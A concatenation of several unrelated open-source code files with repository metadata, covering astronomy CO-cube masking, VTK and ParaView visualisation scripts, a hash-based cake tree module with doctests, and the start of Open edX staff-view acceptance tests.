if galaxy['NAME'] == 'NGC0337':
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=3.5,lowCut=2.0,
minBeamFrac=1.5,
minNchan=3.0,
threeD=True)
else:
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
minBeamFrac=1.5)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'HERACLES'
## use extra HERA data from adam next
elif galaxy['NAME'] in extra_hera_adam_list:
line='21'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'everyHeracles_fromadam_20210318',
galaxy['NAME'].lower()+'_hera_co21_native_fixed_10kms_gauss15.fits')
if galaxy['NAME'] == 'NGC3147':
# this galaxy has a lot of fluffy low-level CO emission. Channel-by-channel thresholding misses much of it, so use a 3D cut that keeps features appearing in multiple channels.
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=3.5,lowCut=2.0,
minBeamFrac=1.5,threeD=True,minNchan=5.0)
elif galaxy['NAME'] == 'NGC3631':
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
skipChan=[5])
elif galaxy['NAME'] == 'NGC4030':
# this galaxy has a lot of fluffy low-level CO emission. Channel-by-channel thresholding misses much of it, so use a 3D cut that keeps features appearing in multiple channels.
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=3.5,lowCut=2.0,
minBeamFrac=1.0,threeD=True,minNchan=3.0)
else:
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'everyHERACLES'
## use HERA data from Andreas next (everyHERACLES)
elif galaxy['NAME'] in extra_hera_list:
line='21'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'co_from_andreas',
galaxy['NAME'].lower()+'_hera_co21.cube_fixed_10kms_gauss15.fits')
if galaxy['NAME'] == 'NGC3631':
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
skipChan=[5])
elif galaxy['NAME'] == 'NGC4030':
# this galaxy has a lot of fluffy low-level CO emission. Channel-by-channel thresholding misses much of it, so use a 3D cut that keeps features appearing in multiple channels.
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=3.5,lowCut=2.0,
minBeamFrac=1.0,threeD=True,minNchan=3.0)
elif galaxy['NAME'] == 'NGC3147':
# this galaxy has a lot of fluffy low-level CO emission. Channel-by-channel thresholding misses much of it, so use a 3D cut that keeps features appearing in multiple channels.
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=3.5,lowCut=2.0,
minBeamFrac=1.5,threeD=True,minNchan=5.0)
elif galaxy['NAME'] == 'NGC4501':
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
skipChan=[15])
elif galaxy['NAME'] == 'NGC4535':
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut,
minBeamFrac=1.5)
else:
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'everyHERACLES_Andreas'
## use bima third
elif galaxy['NAME'] in bima_list:
line='10'
outName = galaxy['NAME']+'_12CO_mask.fits'
# single pointing case
if galaxy['NAME'] == 'NGC4414':
cubeFile = os.path.join(otherDataDir,'bima_song',
galaxy['NAME']+'_bima_gauss15_fixed.fits')
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,
lowCut=lowCut)
# multiple pointing cases
else:
cubeFile = os.path.join(otherDataDir,'bima_song',
galaxy['NAME']+'_bima_gauss15_fixed.fits')
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,
lowCut=2.0,
noise3D=True)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'BIMASONG'
## use ovro next
elif galaxy['NAME'] in ovro_list:
line='10'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'temp_co',
galaxy['NAME'].lower()+'.co.cmmsk_gauss15_fixed.fits')
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut,lowCut=lowCut)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'OVRO'
##
elif galaxy['NAME'] == 'NGC4038':
line='10'
outName = galaxy['NAME']+'_12CO_mask.fits'
cubeFile = os.path.join(otherDataDir,'ngc4038_from_chris',
'ngc_4038_4039_7m_co10_fixed_gauss15.fits')
## ALMA DATA FROM CHRIS WILSON
cubemask(cubeFile,
outName,
outDir=maskDir,
peakCut=peakCut, lowCut=lowCut)
degas_table['MASK'][degas_table['NAME'] == galaxy['NAME']] = 'WILSON'
else:
generateMoments=False
print(galaxy['NAME']+" doesn't appear to have ancillary CO data.")
if generateMoments:
# copy cube over to 12CO directory. Potentially could just do
# this via a copy command. Doing it via spectral_cube so I can
# add other features in and make sure that the header is
# sanitized.
cube = SpectralCube.read(cubeFile)
cube.write(os.path.join(maskDir,galaxy['NAME']+'_12CO'+line+'.fits'),overwrite=True)
# Mom0
makeMap(cubeFile,maskDir,
#maskFile = os.path.join(maskDir,outName),
baseName=galaxy['NAME']+'_12CO'+line,
maptype='moment',order=0)
# peakInt
makeMap(cubeFile,maskDir,
#maskFile = os.path.join(maskDir,outName),
baseName=galaxy['NAME']+'_12CO'+line,
maptype='peakIntensity')
# moment 1
makeMap(cubeFile, maskDir,
#maskFile = os.path.join(maskDir,outName),
baseName=galaxy['NAME']+'_12CO',
maptype='moment',order=1)
# peak Vel
makeMap(cubeFile,maskDir,
#maskFile = os.path.join(maskDir,outName),
baseName=galaxy['NAME']+'_12CO',
maptype='peakVelocity')
# 2D mask
makeMap(os.path.join(maskDir,outName), maskDir,
baseName = galaxy['NAME']+'_12CO',
maptype='mask2D')
# write out degas data base table with the mask used.
degas_table.write(os.path.join(scriptDir,"degas_base.fits"),overwrite=True)
|
low-sky/degas
|
scripts/process_12CO.py
|
Python
|
gpl-3.0
| 12,171
|
[
"Galaxy"
] |
095446f71ab24477a069ec42acabc7fa77fcd36844e40809d55b0f4eb381cd48
|
'''
Created on Aug 5, 2014
@author: gearsad
'''
import vtk
from SceneObject import SceneObject
class Text(SceneObject):
'''
A text object.
'''
# The camera texture (apparently carried over from a CameraScreen class; unused here)
cameraVtkTexture = None
def __init__(self, renderer, parent, text, scale, position):
'''
Initialize the Text object.
'''
# Call the parent constructor
super(Text,self).__init__(renderer, parent)
atext = vtk.vtkVectorText()
atext.SetText(text)
textMapper = vtk.vtkPolyDataMapper()
textMapper.SetInputConnection(atext.GetOutputPort())
# self.vtkActor = vtk.vtkFollower()
self.vtkActor.SetMapper(textMapper)
self.vtkActor.SetScale(scale, scale, scale)
self.vtkActor.SetPosition(position)
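# Usage sketch (illustrative only; assumes a live vtkRenderer and whatever
# parent the SceneObject base class accepts):
#   text = Text(renderer, parent, "hello", 0.1, (0.0, 0.0, 0.0))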
|
GearsAD/semisorted_arnerve
|
arnerve/scene/Text.py
|
Python
|
mit
| 799
|
[
"VTK"
] |
7d9ef08004844d50f7fc4a946e272deaa091c9e4fcf6ee43efb6443d5b57fb8c
|
from enum import IntEnum
from hashkernel.bakery import (
CakePath, HasCake, Cake, CakeRack, CakeRole)
from hashkernel import Str2Bytes
class NodeState(IntEnum):
"""
>>> list(NodeState) #doctest: +NORMALIZE_WHITESPACE
[<NodeState.unknown: 0>, <NodeState.scanning: 1>,
<NodeState.scanned: 2>, <NodeState.storing: 3>,
<NodeState.stored: 4>, <NodeState.pruned: 5>]
>>> [v.end_state() for v in NodeState]
[False, False, True, False, True, True]
"""
unknown = 0
scanning = 1
scanned = 2
storing = 3
stored = 4
pruned = 5
def end_state(self):
# terminal states ('scanned', 'stored', 'pruned') all end in 'd'
return self.name[-1] == 'd'
class Node(HasCake):
def __init__(self, parent, name, state=NodeState.unknown):
self.name = name
self.parent = parent
self.state = state
if isinstance(self.parent, Neuron):
self.parent.add_child(self)
elif self.parent is not None:
raise AssertionError('has to be Neuron or None')
def __str__(self):
return '/'.join( g.name for g in self.ancestry())
def __repr__(self):
return str(self)
def root(self):
if self.parent is not None:
return self.parent.root()
else:
return self
def cake_path(self, relative=None):
path = list(self.ancestry(include_root=True))
if path[0].relative():
relative = True
elif relative is None:
relative = False
path_names = [p.name for p in path[1:]]
if relative:
return CakePath(None, _root=None, _path=path_names)
else:
return CakePath(None, _root=path[0].portal, _path=path_names)
def ancestry(self, include_root=None):
include_self = True
if self.parent is not None:
for grandpa in self.parent.ancestry(include_root):
yield grandpa
else: #CakeTree
include_self = not(self.relative()) if include_root is None \
else include_root
if include_self:
yield self
def __iter__(self):
""" no children implementation """
return
yield # pragma: no cover
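# (The unreachable 'yield' after 'return' is the standard idiom for an
# empty generator: iterating a leaf node yields nothing but stays iterable.)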
def role(self):
return self.cake().header.role
class CakeNode(Node):
def __init__(self, parent, name, cake, state=NodeState.unknown):
Node.__init__(self,parent, name, state)
self._cake = Cake.ensure_it(cake)
def cake(self):
return self._cake
class Neuron(Node, Str2Bytes):
def __init__(self, parent, name, state=NodeState.unknown):
Node.__init__(self, parent, name, state)
self.store = {}
self._bundle = None
def prune(self):
return CakeNode(self.parent, self.name, self.cake(),
NodeState.pruned)
def role(self):
return CakeRole.NEURON
def clean(self):
self._bundle = None
if self.parent is not None:
self.parent.clean()
def add_child(self, child):
self.store[child.name] = child
self.clean()
def __setitem__(self, k, cake):
k = CakePath.ensure_it(k)
nxt_path, reminder = k.next_in_relative_path()
if reminder is None:
if nxt_path is None:
raise AssertionError('Cannot set itself')
else:
self.store[nxt_path] = CakeNode(self, nxt_path, cake)
self.clean()
else:
if nxt_path not in self.store:
self.store[nxt_path] = Neuron(self,nxt_path)
self.store[nxt_path][reminder] = cake
def __delitem__(self, k):
k = CakePath.ensure_it(k)
self._bundle = None
nxt_path, reminder = k.next_in_relative_path()
if reminder is None:
if nxt_path is None:
raise AssertionError('Cannot delete itself')
else:
del self.store[nxt_path]
self.clean()
else:
del self.store[nxt_path][reminder]
def __getitem__(self, k):
k = CakePath.ensure_it(k)
nxt_path, reminder = k.next_in_relative_path()
if reminder is None:
if nxt_path is None:
return self
else:
return self.store[nxt_path]
else:
return self.store[nxt_path][reminder]
def __len__(self):
return len(self.store)
def __contains__(self, k):
k = CakePath.ensure_it(k)
nxt_path, reminder = k.next_in_relative_path()
if reminder is None:
if nxt_path is not None:
return nxt_path in self.store
else:
return False
else:
return reminder in self.store[nxt_path]
def __iter__(self):
for name in sorted(self.store):
yield self.store[name]
def visit_tree(self, depth=None):
if depth is not None:
if depth <= 0 :
return
depth -= 1
if depth is None or depth > 0 :
for v in self:
if isinstance(v, Neuron):
for child in v.visit_tree(depth):
yield child
else:
yield v
yield self
def bundle(self):
if self._bundle is None:
self._bundle = CakeRack()
for k in self.store:
self._bundle[k]= self.store[k].cake()
return self._bundle
def cake(self):
return self.bundle().cake()
class CakeTree(Neuron):
"""
>>> x = CakeTree()
>>> x['a/b'] = '0'
>>> x.cake()
Cake('1kmRGqqGH36SWaMEp1EsTSLWbFKGN8VvMyd7M7uyzJQ9')
>>> x.bundle().content()
'[["a"], ["CrBXOJUepyW6bMd2Wgl"]]'
>>> x["a"].bundle().content()
'[["b"], ["0"]]'
>>> "a" in x
True
>>> x["a"].cake()
Cake('CrBXOJUepyW6bMd2Wgl')
>>> x["a/b"].cake()
Cake('0')
>>> list(x['a/b'].ancestry())
[a, a/b]
>>> "a/b" in x
True
>>> "" in x
False
>>> x['a/c'] = '0'
>>> x['a/c'].root() == x
True
>>> x['a/c'].cake_path()
CakePath('a/c')
>>> x['a/c'].cake_path(relative=False)
CakePath('a/c')
>>> list(x['a/b'])
[]
>>> list(x['a'])
[a/b, a/c]
>>> list(x)
[a]
>>> x.cake()
Cake('3IRoNogXy7sW3pKtB66DCwNbqEvDgYZ7iDGLzimya2MV')
>>> x["a"].bundle().content()
'[["b", "c"], ["0", "0"]]'
>>> len(x["a"])
2
>>> del x["a/c"]
>>> x.cake()
Cake('1kmRGqqGH36SWaMEp1EsTSLWbFKGN8VvMyd7M7uyzJQ9')
>>> x["a"].bundle().content()
'[["b"], ["0"]]'
>>> x["a"].cake()
Cake('CrBXOJUepyW6bMd2Wgl')
>>> x[""].cake()
Cake('1kmRGqqGH36SWaMEp1EsTSLWbFKGN8VvMyd7M7uyzJQ9')
>>> len(x)
1
>>> x[""]="0"
Traceback (most recent call last):
...
AssertionError: Cannot set itself
>>> del x[""]
Traceback (most recent call last):
...
AssertionError: Cannot delete itself
>>> x.bundle().content()
'[["a"], ["CrBXOJUepyW6bMd2Wgl"]]'
>>> from hashkernel.bakery import Cake
>>> g=Cake('4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T')
>>> y=CakeTree(g)
>>> y
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T
>>> y['a/b/c']='0'
>>> y['a/z']='0'
>>> y['a/b/c']
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b/c
>>> list(y.visit_tree(3)) #doctest: +NORMALIZE_WHITESPACE
[/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/z,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T]
>>> list(y.visit_tree(2)) #doctest: +NORMALIZE_WHITESPACE
[/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T]
>>> list(y.visit_tree(1))
[/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T]
>>> list(y.visit_tree(0))
[]
>>> list(y.visit_tree(None)) #doctest: +NORMALIZE_WHITESPACE
[/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b/c,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/z,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T]
>>> [ v.role().code for v in y.visit_tree()]
[0, 1, 0, 1, 1]
>>> len(list(y.visit_tree(None))) == len(list(y.visit_tree(4)))
True
>>> y['a/b'].prune()
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b
>>> list(y.visit_tree(None)) #doctest: +NORMALIZE_WHITESPACE
[/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/z,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a,
/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T]
>>> isinstance(y['a/b'],CakeNode)
True
>>> y['a']['b'].cake_path(relative=True)
CakePath('a/b')
>>> y['a']['b'].cake_path()
CakePath('/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b')
>>> y['a']['b'].cake_path(relative=False)
CakePath('/4Fm5goWjjISStoovcZaowz0heUxOv4CXbUob0CBKi46T/a/b')
"""
def __init__(self, portal = None, path =None):
self.portal = portal
self.path = path
name = None if portal is None else '/' + str(self.portal)
Neuron.__init__(self, None, name)
def relative(self):
return self.portal is None
def __str__(self):
return '' if self.name is None else self.name
|
walnutgeek/hashstore
|
hashstore/bakery/cake_tree.py
|
Python
|
apache-2.0
| 9,430
|
[
"NEURON"
] |
98a27a5437acada37b9d362557e6ac63117166a4a5f865d8c23e9884e21bcd4d
|
from paraview.simple import *
import glob
import re
opacityBaffles=0.6
opacityImpeller=1.0
opacityTank=0.2
liste = glob.glob('./post/VTK/mixer_*.vtk')
listeImpl = glob.glob('./post/VTK/impeller_*.stl')
listeTank = glob.glob('/home/bruno/doctorat/mesh/PBT_Manon/tank.stl')
listeBafflesB = glob.glob('/home/bruno/doctorat/mesh/PBT_Manon/baffles/baffB.stl')
listeBafflesF = glob.glob('/home/bruno/doctorat/mesh/PBT_Manon/baffles/baffF.stl')
listeBafflesL = glob.glob('/home/bruno/doctorat/mesh/PBT_Manon/baffles/baffL.stl')
listeBafflesR = glob.glob('/home/bruno/doctorat/mesh/PBT_Manon/baffles/baffR.stl')
# Function to sort the files in a natural fashion
def natural_sort(l):
convert = lambda text: int(text) if text.isdigit() else text.lower()
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
return sorted(l, key = alphanum_key)
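# e.g. natural_sort(['mixer_10.vtk', 'mixer_2.vtk']) -> ['mixer_2.vtk', 'mixer_10.vtk']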
liste=natural_sort(liste)
listeImpl=natural_sort(listeImpl)
# LOAD THE IMPELLER
impeller=STLReader(FileNames=listeImpl)
GetActiveSource()
DataRepresentation1 = Show()
DataRepresentation1.PointSpriteDefaultsInitialized = 1
DataRepresentation1.SelectionPointFieldDataArrayName = 'STLSolidLabeling'
DataRepresentation1.SelectionCellFieldDataArrayName = 'STLSolidLabeling'
DataRepresentation1.ColorArrayName = ('CELL_DATA', '')
DataRepresentation1.RadiusRange = [-0.08255, 0.08255]
DataRepresentation1.ScaleFactor = 0.02920000106096268
STLReader2 = FindSource( "STLReader2" )
my_representation0 = GetDisplayProperties( STLReader2 )
RenameSource("Impeller", STLReader2)
# LOAD THE TANK
tank=STLReader(FileNames=listeTank)
STLReader2 = GetActiveSource()
RenderView1 = GetRenderView()
RenderView1.CameraPosition = [0.0, 0.0, 1.4038138401361357]
RenderView1.CameraClippingRange = [0.8459256875250272, 1.6967960548430514]
RenderView1.CameraFocalPoint = [0.0, 0.0, 0.18250000476837158]
RenderView1.CameraParallelScale = 0.31609928064038195
RenderView1.CenterOfRotation = [0.0, 0.0, 0.18250000476837158]
DataRepresentation1 = Show()
DataRepresentation1.ConstantRadius = 0.18250000476837158
DataRepresentation1.EdgeColor = [0.0, 0.0, 0.5000076295109483]
DataRepresentation1.PointSpriteDefaultsInitialized = 1
DataRepresentation1.SelectionPointFieldDataArrayName = 'STLSolidLabeling'
DataRepresentation1.SelectionCellFieldDataArrayName = 'STLSolidLabeling'
DataRepresentation1.ColorArrayName = ('CELL_DATA', 'STLSolidLabeling')
DataRepresentation1.Texture = []
DataRepresentation1.AmbientColor = [0.0, 0.0, 0.0]
DataRepresentation1.CubeAxesColor = [0.0, 0.0, 0.0]
DataRepresentation1.RadiusRange = [-0.1825, 0.1825]
DataRepresentation1.ScaleFactor = 0.03650000095367432
DataRepresentation2 = GetDisplayProperties( STLReader2 )
DataRepresentation2.Opacity = opacityTank
DataRepresentation2.ColorArrayName = ('CELL_DATA', '')
RenameSource("Tank", STLReader2)
#PARTICLES
square=LegacyVTKReader(FileNames=liste)
RenderView1 = GetRenderView()
RenderView1.CameraPosition = [-0.00032399967312812805, -0.0002795010805130005, 0.799224061999444]
RenderView1.CameraClippingRange = [0.5396848694000508, 0.5986885115576086]
RenderView1.CameraFocalPoint = [-0.00032399967312812805, -0.0002795010805130005, 0.23402100056409836]
RenderView1.CameraParallelScale = 0.1462853166497175
RenderView1.CenterOfRotation = [-0.00032399967312812805, -0.0002795010805130005, 0.23402100056409836]
DataRepresentation1 = Show()
DataRepresentation1.ConstantRadius = 0.0015
DataRepresentation1.EdgeColor = [0.0, 0.0, 0.5000076295109483]
DataRepresentation1.PointSpriteDefaultsInitialized = 1
DataRepresentation1.SelectionPointFieldDataArrayName = 'f'
DataRepresentation1.SelectionCellFieldDataArrayName = 'radius'
DataRepresentation1.ColorArrayName = ('POINT_DATA', 'radius')
DataRepresentation1.Texture = []
DataRepresentation1.AmbientColor = [0.0, 0.0, 0.0]
DataRepresentation1.Representation = 'Point Sprite'
DataRepresentation1.CubeAxesColor = [0.0, 0.0, 0.0]
DataRepresentation1.RadiusRange = [-0.10308, 0.102432]
DataRepresentation1.ScaleFactor = 0.020727699995040896
a1_radius_PVLookupTable = GetLookupTableForArray( "radius", 1, RGBPoints=[0.004000000189989805, 0.0, 0.0, 1.0, 0.004000000189989905, 1.0, 0.0, 0.0], VectorMode='Component', NanColor=[0.498039, 0.498039, 0.498039], ColorSpace='HSV', ScalarRangeInitialized=1.0 )
a1_radius_PiecewiseFunction = CreatePiecewiseFunction( Points=[0.004000000189989805, 0.0, 0.5, 0.0, 0.004000000189989905, 1.0, 0.5, 0.0] )
Render()
# LOAD THE BAFFLES one by one..
# R Baffle
bafflesR=STLReader(FileNames=listeBafflesR)
STLReader3 = GetActiveSource()
DataRepresentation2 = GetDisplayProperties( STLReader3 )
DataRepresentation2.Opacity = opacityBaffles
DataRepresentation2.ColorArrayName = ('CELL_DATA', '')
RenameSource("BaffR", STLReader3)
# L Baffle
bafflesL=STLReader(FileNames=listeBafflesL)
STLReader4 = GetActiveSource()
DataRepresentation2 = GetDisplayProperties( STLReader4 )
DataRepresentation2.Opacity = opacityBaffles
DataRepresentation2.ColorArrayName = ('CELL_DATA', '')
# F baffle
bafflesF=STLReader(FileNames=listeBafflesF)
STLReader5 = GetActiveSource()
DataRepresentation2 = GetDisplayProperties( STLReader5 )
DataRepresentation2.Opacity = opacityBaffles
DataRepresentation2.ColorArrayName = ('CELL_DATA', '')
# B baffle
bafflesB=STLReader(FileNames=listeBafflesB)
STLReader6 = GetActiveSource()
DataRepresentation2 = GetDisplayProperties( STLReader6 )
DataRepresentation2.Opacity = opacityBaffles
DataRepresentation2.ColorArrayName = ('CELL_DATA', '')
|
mendax-grip/cfdemUtilities
|
paraview/mixerParticlesBaffles.py
|
Python
|
lgpl-3.0
| 5,661
|
[
"ParaView",
"VTK"
] |
8cd70c44700c584601ff337ee00d86349819d933ee9a69429bb695580e8853cf
|
# -*- coding: utf-8 -*-
"""
Tests the "preview" selector in the LMS that allows changing between Staff, Learner, and Content Groups.
"""
from textwrap import dedent
from common.test.acceptance.fixtures.course import CourseFixture, XBlockFixtureDesc
from common.test.acceptance.pages.common.auto_auth import AutoAuthPage
from common.test.acceptance.pages.lms.courseware import CoursewarePage
from common.test.acceptance.pages.lms.instructor_dashboard import InstructorDashboardPage
from common.test.acceptance.pages.lms.staff_view import StaffCoursewarePage
from common.test.acceptance.tests.helpers import UniqueCourseTest, create_user_partition_json
from openedx.core.lib.tests import attr
from xmodule.partitions.partitions import ENROLLMENT_TRACK_PARTITION_ID, MINIMUM_STATIC_PARTITION_ID, Group
@attr(shard=20)
class StaffViewTest(UniqueCourseTest):
"""
Tests that verify the staff view.
"""
USERNAME = "STAFF_TESTER"
EMAIL = "johndoe@example.com"
def setUp(self):
super(StaffViewTest, self).setUp()
self.courseware_page = CoursewarePage(self.browser, self.course_id)
# Install a course with sections/problems, tabs, updates, and handouts
self.course_fixture = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
self.populate_course_fixture(self.course_fixture)
self.course_fixture.install()
# Auto-auth register for the course.
# Do this as global staff so that you will see the Staff View
AutoAuthPage(self.browser, username=self.USERNAME, email=self.EMAIL,
course_id=self.course_id, staff=True).visit()
def _goto_staff_page(self):
"""
Open staff page with assertion
"""
self.courseware_page.visit()
staff_page = StaffCoursewarePage(self.browser, self.course_id)
self.assertEqual(staff_page.staff_view_mode, 'Staff')
return staff_page
@attr(shard=20)
class CourseWithoutContentGroupsTest(StaffViewTest):
"""
Setup for tests that have no content restricted to specific content groups.
"""
def populate_course_fixture(self, course_fixture):
"""
Populates test course with chapter, sequential, and 2 problems.
"""
problem_data = dedent("""
<problem markdown="Simple Problem" max_attempts="" weight="">
<p>Choose Yes.</p>
<choiceresponse>
<checkboxgroup>
<choice correct="true">Yes</choice>
</checkboxgroup>
</choiceresponse>
</problem>
""")
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('problem', 'Test Problem 1', data=problem_data),
XBlockFixtureDesc('problem', 'Test Problem 2', data=problem_data)
)
)
)
@attr(shard=20)
class StaffViewToggleTest(CourseWithoutContentGroupsTest):
"""
Tests for the staff view toggle button.
"""
def test_instructor_tab_visibility(self):
"""
Test that the instructor tab is hidden when viewing as a student.
"""
course_page = self._goto_staff_page()
self.assertTrue(course_page.has_tab('Instructor'))
course_page.set_staff_view_mode('Learner')
self.assertEqual(course_page.staff_view_mode, 'Learner')
self.assertFalse(course_page.has_tab('Instructor'))
@attr(shard=20)
class StaffDebugTest(CourseWithoutContentGroupsTest):
"""
Tests that verify the staff debug info.
"""
def test_reset_attempts_empty(self):
"""
Test that we reset even when there is no student state
"""
staff_debug_page = self._goto_staff_page().open_staff_debug_info()
staff_debug_page.reset_attempts()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(
u'Successfully reset the attempts for user {}'.format(self.USERNAME), msg,
)
def test_delete_state_empty(self):
"""
Test that we delete properly even when there isn't state to delete.
"""
staff_debug_page = self._goto_staff_page().open_staff_debug_info()
staff_debug_page.delete_state()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(
u'Successfully deleted student state for user {}'.format(self.USERNAME), msg,
)
def test_reset_attempts_state(self):
"""
Successfully reset the student attempts
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.reset_attempts()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(
u'Successfully reset the attempts for user {}'.format(self.USERNAME), msg,
)
def test_rescore_problem(self):
"""
Rescore the student
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.rescore()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully rescored problem for user {}'.format(self.USERNAME), msg)
def test_rescore_problem_if_higher(self):
"""
Rescore the student, keeping the new score only if it is higher
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.rescore_if_higher()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully rescored problem to improve score for user {}'.format(self.USERNAME), msg)
def test_student_state_delete(self):
"""
Successfully delete the student state with an answer
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.delete_state()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully deleted student state for user {}'.format(self.USERNAME), msg)
def test_student_by_email(self):
"""
Successfully reset the student attempts using their email address
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.reset_attempts(self.EMAIL)
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully reset the attempts for user {}'.format(self.EMAIL), msg)
def test_bad_student(self):
"""
Test negative response with invalid user
"""
staff_page = self._goto_staff_page()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.delete_state('INVALIDUSER')
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Failed to delete student state for user. User does not exist.', msg)
def test_reset_attempts_for_problem_loaded_via_ajax(self):
"""
Successfully reset the student attempts for problem loaded via ajax.
"""
staff_page = self._goto_staff_page()
staff_page.load_problem_via_ajax()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.reset_attempts()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully reset the attempts for user {}'.format(self.USERNAME), msg)
def test_rescore_state_for_problem_loaded_via_ajax(self):
"""
Rescore the student for problem loaded via ajax.
"""
staff_page = self._goto_staff_page()
staff_page.load_problem_via_ajax()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.rescore()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully rescored problem for user {}'.format(self.USERNAME), msg)
def test_student_state_delete_for_problem_loaded_via_ajax(self):
"""
Successfully delete the student state for problem loaded via ajax.
"""
staff_page = self._goto_staff_page()
staff_page.load_problem_via_ajax()
staff_page.answer_problem()
staff_debug_page = staff_page.open_staff_debug_info()
staff_debug_page.delete_state()
msg = staff_debug_page.idash_msg[0]
self.assertEqual(u'Successfully deleted student state for user {}'.format(self.USERNAME), msg)
class CourseWithContentGroupsTest(StaffViewTest):
"""
Verifies that changing the "View this course as" selector works properly for content groups.
"""
def setUp(self):
super(CourseWithContentGroupsTest, self).setUp()
# pylint: disable=protected-access
self.course_fixture._update_xblock(self.course_fixture._course_location, {
"metadata": {
u"user_partitions": [
create_user_partition_json(
MINIMUM_STATIC_PARTITION_ID,
'Configuration alpha,beta',
'Content Group Partition',
[
Group(MINIMUM_STATIC_PARTITION_ID + 1, 'alpha'),
Group(MINIMUM_STATIC_PARTITION_ID + 2, 'beta')
],
scheme="cohort"
)
],
},
})
def populate_course_fixture(self, course_fixture):
"""
Populates test course with chapter, sequential, and 3 problems.
One problem is visible to all, one problem is visible only to Group "alpha", and
one problem is visible only to Group "beta".
"""
problem_data = dedent("""
<problem markdown="Simple Problem" max_attempts="" weight="">
<choiceresponse>
<label>Choose Yes.</label>
<checkboxgroup>
<choice correct="true">Yes</choice>
</checkboxgroup>
</choiceresponse>
</problem>
""")
self.alpha_text = "VISIBLE TO ALPHA"
self.beta_text = "VISIBLE TO BETA"
self.audit_text = "VISIBLE TO AUDIT"
self.everyone_text = "VISIBLE TO EVERYONE"
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
